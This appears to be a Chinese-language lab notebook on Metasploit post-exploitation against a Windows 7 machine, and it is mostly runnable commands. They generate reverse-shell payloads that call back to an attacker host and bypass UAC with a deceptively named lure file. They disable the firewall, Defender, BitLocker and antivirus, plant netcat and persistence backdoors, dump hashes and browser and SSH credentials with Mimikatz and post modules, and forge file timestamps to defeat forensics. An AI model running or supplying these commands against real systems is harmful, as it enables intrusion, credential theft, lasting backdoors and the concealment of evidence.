十二:后滲透階段
提權,信息收集,滲透內網,永久后門
1:基於已有的session擴大戰果
root@kali:~# msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=1234 -e x86/shikata_ga_nai -f vba-exe
演示就不利用漏洞,直接用payload進行獲得shell
root@kali:~# msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=1234 -b "\x00" -e x86/shikata_ga_nai -i 7 -o kk.exe(32位)
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.10 lport=7777 -f exe -o ak.exe(64位)
把exe復制到阿帕奇網站目錄,便於widows7下載
root@kali:~# cp kk.exe /var/www/html/
msf5 use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 192.168.1.10
msf5 exploit(multi/handler) > set lport 7777
msf5 exploit(multi/handler) > exploit
2:獲取系統帳號權限
被拒絕,UAC權限限制,需要繞過
3:繞過UAC權限限制
(1)
msf5 exploit(windows/local/bypassuac) > use exploit/windows/local/ask
msf5 exploit(windows/local/ask) > show options
msf5 exploit(windows/local/ask) > set payload windows/meterpreter/reverse_tcp
msf5 exploit(windows/local/ask) > set lhost 192.168.1.10
msf5 exploit(windows/local/ask) > set filename wn_updata.exe
msf5 exploit(windows/local/ask) > set session 1
msf5 exploit(windows/local/ask) > exploit
名字取好一點,用戶點擊就可以繞過UAC
成功獲得系統權限
(2)(64位操作系統windows7為例子,無須誘導即可UAC繞過)
msf5 exploit(multi/handler) > use exploit/windows/local/bypassuac
msf5 exploit(windows/local/bypassuac) > show options
msf5 exploit(windows/local/bypassuac) > set payload windows/meterpreter/reverse_tcp
msf5 exploit(windows/local/bypassuac) > set lhost 192.168.1.10
msf5 exploit(windows/local/bypassuac) > set session 1
msf5 exploit(windows/local/bypassuac) > show targets
msf5 exploit(windows/local/bypassuac) > set target 1
成功
Hashdump(取得系統的sessions就可以把hash dump出來)
(3)msf5 exploit(windows/local/bypassuac) > use exploit/windows/local/bypassuac_injection
由於我的版本是64位,所以失敗了,不過前面這個雖然也需要32位版本,但成功了
4:利用本地漏洞直接提權
(1)版本需求,32位
msf5 exploit(windows/local/bypassuac_injection) > use exploit/windows/local/ms13_053_schlamperei
set target 1
(2)32位
msf5 exploit(windows/local/ms13_053_schlamperei) > use exploit/windows/local/ms13_081_track_popup_menu
(3)其他模塊
msf5 exploit(windows/local/ms13_081_track_popup_menu) > use exploit/windows/local/ms13_097_ie_registry_symlink
msf5 exploit(windows/local/ms13_097_ie_registry_symlink) > use exploit/windows/local/ppr_flatten_rec
可以選擇多種模塊來試一試
(4)可視化payload,可以進行控制
在sessions的基礎下可以
msf5 exploit(windows/local/bypassuac) > set payload payload/windows/vncinject/reverse_tcp
msf5 exploit(windows/local/bypassuac) > set viewonly no(這個就是控制的關鍵)
成功
Hashdump(基於系統權限)
可能會報錯
解決:
meterpreter > getprivs
再把進程遷移到系統進程即可
5:使用哈希密碼進行密碼身份認證
msf5 exploit(windows/local/bypassuac) > use exploit/windows/smb/psexec
msf5 exploit(windows/smb/psexec) > show options
msf5 exploit(windows/smb/psexec) > set rhosts 192.168.1.8
msf5 exploit(windows/smb/psexec) > set smbuser delusion
msf5 exploit(windows/smb/psexec) > set smbpass aad3b435b51404eeaad3b435b51404ee:d0c9ab2c9d99e0a93f1707
msf5 exploit(windows/smb/psexec) > exploit
記得設置payload
成功
PS:需要提前關閉uac
步驟:進入shell
依次輸入這些命令再重啟即可
6:關閉windwos防火牆
需要管理員和system權限
在shell里面執行命令
C:\Windows\system32>netsh advfirewall set allprofiles state off
打開用on
7:關閉windefend(windows自己的防護)
C:\Windows\system32>net stop windefend
8:bitlocker磁盤加密(關閉windows的磁盤加密)
C:\Windows\system32>manage-bde -off C(關閉加密)
C:\Windows\system32>manage-bde -status(看是否加密)
應該是中文原因所以亂碼了,但還是可以看到
9:關閉DEP(硬件防護系統)
關閉成功
C:\Windows\system32>bcdedit.exe /set {current} nx AlwayxOff
10:殺死防病毒軟件
(1)meterpreter > run killav
(2)meterpreter > run post/windows/manage/killav
11:啟動遠程管理工具
(1)
meterpreter > run post/windows/manage/enable_rdp
打開遠程端口和服務,會自動保存一個關閉文件
root@kali:~# rdesktop 192.168.1.8
遠程連接
關閉遠程桌面服務
meterpreter > run multi_console_command -r /root/.msf4/loot/20200521092947_default_192.168.1.8_host.windows.cle_029447.txt
(2)開啟遠程桌面服務
meterpreter > run getgui -e
添加遠程桌面帳號,即可以不用知道帳號密碼來遠程桌面
meterpreter > run getgui -u admin -p 123456
注意,有些版本不支持
12:查看遠程桌面
(1)
meterpreter > screenshot (截圖桌面)
(2)
meterpreter > use espia
meterpreter > screengrab
13:token
use exploit/windows/local/bypassuac
域環境下比較多,企業環境比較多
14:注冊表,前提:已經取得shell
(1)注冊表添加nc后門服務,適用ip固定的
meterpreter > upload /usr/share/windows-binaries/nc.exe C:\\windows\\system32
meterpreter > reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run
meterpreter > reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc -d 'C"\windwos\system32\nc.exe -Ldp 444 -e cmd.exe'
meterpreter > reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\Run -v nc
Key: HKLM\software\microsoft\windows\currentversion\Run
(2)打開防火牆允許端口(meterpreter)
meterpreter > execute -f cmd -i H(隱蔽方式進入命令提示符)
C:\Windows\System32>netsh firewall show opmode(看防火牆狀態)
C:\Windows\System32>netsh firewall add portopening TCP 4444 "Kk"(進程名字,可以具有欺騙性) ENABLE ALL
netsh firewall add portopening TCP 4444 "Kk" ENABLE ALL
C:\Windows\System32>shutdown -r -t 0(重啟即可)
C:\Windows\System32>nc 192.168.1.8 4444 (nc連接即可)
15:后滲透信息收集抓包
meterpreter > load sniffer (導入模塊)
meterpreter > sniffer_interfaces (查看信息,可用抓包模塊)
meterpreter > sniffer_start 2
meterpreter > sniffer_dump 2 1.cap
解碼
meterpreter > background
msf5 exploit(windows/local/bypassuac) > use auxiliary/sniffer/psnuffle
msf5 auxiliary(sniffer/psnuffle) > show options
msf5 auxiliary(sniffer/psnuffle) > set pcapfile /root/1.cap
msf5 auxiliary(sniffer/psnuffle) > run
可以用wireshark也行
16:搜索文件
meterpreter > search -f *.ini (全局搜索)
meterpreter > search -d c:\\documents\ and\ settings\\administrator\\desktop\\ -f *.dock(指定目錄搜索)
17:john the ripper 破解弱口令
msf5 auxiliary(sniffer/psnuffle) > use post/windows/gather/hashdump (system權限)
msf5 post(windows/gather/hashdump) > show options
msf5 post(windows/gather/hashdump) > set session 2
msf5 post(windows/gather/hashdump) > exploit (結果在/tmp目錄下)
簡單密碼破解
exploit即可
18:銷毀痕跡,防止電子取證,銷毀文件系統訪問痕跡
(meterpreter基於內存,更隱秘)
(1)Mac時間
修改內容會使文件修改時間改變
觀看內容會使文件觀看時間改變
修改文件屬性權限也會使文件修改權限時間改變
查看對應的時間
root@kali:~# ls -l 1.txt
root@kali:~# ls -l --time=atime 1.txt
root@kali:~# ls -l --time=ctime 1.txt
root@kali:~# stat 1.txt
root@kali:~# touch -d "2 day ago" 1.txt把時間提前兩天
root@kali:~# touch -t 0101010101 1.txt(對應年月日時分)
可以看到改變了
但changge時間不會改變
(2)模塊修改時間,能力更大(timestomp)
PS:時間不要改的太離譜
基於meterprter
Mac都可以修改設置
meterpreter > pwd
meterpreter > ls
meterpreter > timestomp -v 1.txt.txt(顯示具體信息)
meterpreter > timestomp 1.txt.txt -f msf.pdf
把1.txt.txt的時間改為與msf.pdf一樣
自定義改時間
-a -c -m -e 對應
Modified : 2020-05-20 11:33:20 +0800
Accessed : 2020-05-20 11:27:02 +0800
Created : 2020-05-20 11:27:02 +0800
Entry Modified: 2020-05-20 11:33:54 +0800
-z 對應全部
19:pivoting跳板/樞紐/支點5
也就是說先控制一台機器,然后再攻擊其內部網絡的其他機器
msf5 exploit(windows/local/bypassuac) > use auxiliary/scanner/portscan/tcp
考慮映射ip端口,因為兩邊都有防火牆
20:常用的POST模塊
(1):(arp掃描模塊)
meterpreter > run post/windows/gather/arp_scanner RHOSTS=192.168.1.0/24
(2)(看是否為虛擬機)
meterpreter > run post/windows/gather/checkvm
(3):(查看hash)
meterpreter > run post/windows/gather/credentials/credential_collector
(4): (裝的軟件以及版本)
meterpreter > run post/windows/gather/enum_applications
(5): (當前登錄的用戶)
meterpreter >run post/windows/gather/enum_logged_on_users
(6): (查看snmp的配置,如果目標有的話)
meterpreter > run post/windows/gather/enum_snmp
(7):(查看local漏洞,本地提權)
meterpreter > run post/multi/recon/local_exploit_suggester
(8):(刪除目標系統用戶名對應的帳號)
meterpreter > run post/windows/manage/delete_user USERNAME=admin
(9):(查看配置信息)
meterpreter > run post/multi/gather/env
(10)查看火狐瀏覽器的帳號密碼
meterpreter > run post/multi/gather/firefox_creds
查看火狐瀏覽器的帳號密碼
(11)收集ssh的密碼信息
meterpreter > run post/multi/gather/ssh_creds
(12)(看文件是否為惡意文件)
meterpreter > run post/multi/gather/check_malware REMOTEFILE=C:\\Users\\delusion\\Desktop\\msf.pdf
21自動執行meterpreter腳本
就是說用戶一點擊就執行
msf5 exploit(windows/local/bypassuac) > advanced
查看高級選項,一般里面就有自動化腳本選項
msf5 exploit(windows/local/bypassuac) > set AutoRunScript migrate -n explorer.exe(自動遷移到這個系統軟件的腳本)
msf5 exploit(windows/local/bypassuac) > set AutoRunScript set target 1post/windows/gather/dumplinks(前提必須要把用戶進行調整)
(自動收集快捷方式)
這個腳本只能用一條命令,所有用遷移進程是最好的
msf5 exploit(windows/local/bypassuac) > set InitialAutoRunScript post/windows/gather/dumplinks(意思是先運行auto腳本,再運行這一腳本)];
進行劫持
把www.abcbaidu.com解析為2.2.2.2的ip
22:持久后門
(1):meterpreter后門
meterpreter > run metsvc -A
msf5 exploit(windows/local/bypassuac) > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/metsvc_bind_tcp
msf5 exploit(multi/handler) > set lport 31337
msf5 exploit(multi/handler) > set rhost 192.168.1.8
msf5 exploit(multi/handler) > exploit
后門不理想,密碼沒有,端口一直開 set target 1
(2):持久后門
meterpreter > run persistence -h
meterpreter > run persistence -x -r 192.168.1.10 -p 1234
meterpreter > exit
msf5 exploit(windows/local/bypassuac) > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 192.168.1.10
msf5 exploit(multi/handler) > set lport 1234
msf5 exploit(multi/handler) > set exitonsession false
msf5 exploit(multi/handler) > exploit -j -z
重啟windwos即可
可以看到成功了
23:MSF延展用法之Mimikatz
meterpreter > getsystem
meterpreter > load mimikatz
meterpreter > help
meterpreter >msv(獲取哈希值)
meterpreter > ssp
meterpreter > tspkg
(看系統信息和哈希)
meterpreter > wdigest
meterpreter > kerberos
(看密碼)
meterpreter > mimikatz_command
里面的模塊
最后一個模塊是拿來玩掃雷游戲的,就別看了有start ,cheat,等功能
24:PHPshell
通過瀏覽器來反彈shell
把php拷貝到網站目錄即可,前提得有這個漏洞,可以用dvwa來進行實驗
25:web delivery
如果服務器有代碼執行漏洞,可以用dvwa來進行實驗
26:RFI遠程文件包含
27:Karmetasploit
先用無線偽造AP,然后再用msf模塊對流經的流量進行分析,瀏覽器攻擊
root@kali:~# wget https://www.offensive-security.com/wp-content/uploads/2015/04/karma.rc_.txt
下載模塊
相當於一個腳本,自己可以設置
偽造ap參考wlan無線筆記
基礎架構配置
root@kali:~# vi /etc/dhcp/dhcpd.conf
偽造AP
就可以了
由於沒有用AP連接網絡,但需要修改才可以造成欺騙效果
客戶無法正常上網
root@kali:~# vi karma.rc_.txt
把setg的全部參數全部刪除
添加路由和防火牆規則
root@kali:~# echo 1 > /proc/sys/net/ipv4/ip_forward
root@kali:~# iptables -P FORWARD ACCEPT
root@kali:~# iptables -t nat -A POSTROUTING -o eth0 -j MASQUERAD
28:十三:armitage 圖形化前端
由於msf更新導致其不兼容,所以2020新版
Kali已經沒有了這一軟件,可以安舊版本,或者參考這一博客
https://www.jianshu.com/p/412ce1fc7adc
作者有點懶。。。。。
